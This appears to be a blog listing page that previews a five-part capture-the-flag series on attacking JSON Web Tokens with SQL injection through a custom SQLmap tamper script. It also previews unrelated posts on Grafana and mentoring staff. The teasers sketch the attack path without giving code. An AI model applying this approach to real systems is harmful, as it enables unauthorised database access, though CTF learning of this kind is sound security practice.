Security

Capture The Flag (CTF) Challenge – Part 5

This entry is part 5 of 5 in the series Capture The Flag

ATTACKING JWT’S WITH A CUSTOM SQLMAP TAMPER SCRIPT Automating the Attack with SQLmap and a Custom Tamper Script Let’s review what I know and where I’m at in capturing the flag: The web server is NodeJS Express The database is SQLite The hole in the wall is the JSON Web Token. The JWT username field is vulnerable…

Read article
Security

Capture The Flag (CTF) Challenge – Part 4

This entry is part 4 of 5 in the series Capture The Flag

ATTACKING JWT’S WITH A CUSTOM SQLMAP TAMPER SCRIPT The Path of Attack After reading the documentation on JWT’s, I decided that this will be my next path of attack. There were a few hints to push me down this path. First, I looked up JWT vulnerabilities. Most attack techniques go after the algorithm for signing…

Read article
Security

Capture The Flag (CTF) Challenge – Part 3

This entry is part 3 of 5 in the series Capture The Flag

ATTACKING JWT’S WITH A CUSTOM SQLMAP TAMPER SCRIPT Digging Deeper into the Code Lets start to look under the hood of the site some more. Maybe the developers left a comment in the website code pointing to a hole.  Maybe some JavaScript gets loaded that holds the vulnerability.  Whatever it is, I have to look…

Read article
Security

Capture The Flag (CTF) Challenge – Part 1

This entry is part 1 of 5 in the series Capture The Flag

Attacking JWT’s with a Custom SQLmap Tamper Script Introduction If you’ve ever watched a movie or TV show that involves computer “hacking”, you’ll recognize these scenes. Someone wearing a hoody (of course) hunched over six monitors of scrolling text, frantically typing and instantly programming some complex code to break past a firewall. My favourite (facepalming)…

Read article
DevOps

Making the most of Grafana open source dashboards

I came across this recent blog post on OpenSource.com about the Top 10 Grafana Features. We too love Grafana of course (blog post). it’s amazing that for a project that’s under 7 years old already has over a 1/2 million installations! Here are the top features of Grafana that we use ourselves, or help our…

Read article
People

3 Keys To Nurture Your ‘A’ Player

So you’ve just hired an A player in a technical role – young, super “green,” and with all the potential in the world. You’ve developed and taken her through a tight onboarding program; a couple weeks of learning, training, and culture-infusion. She’s hooked and ready to start real work. Now what? Here are three things…

Read article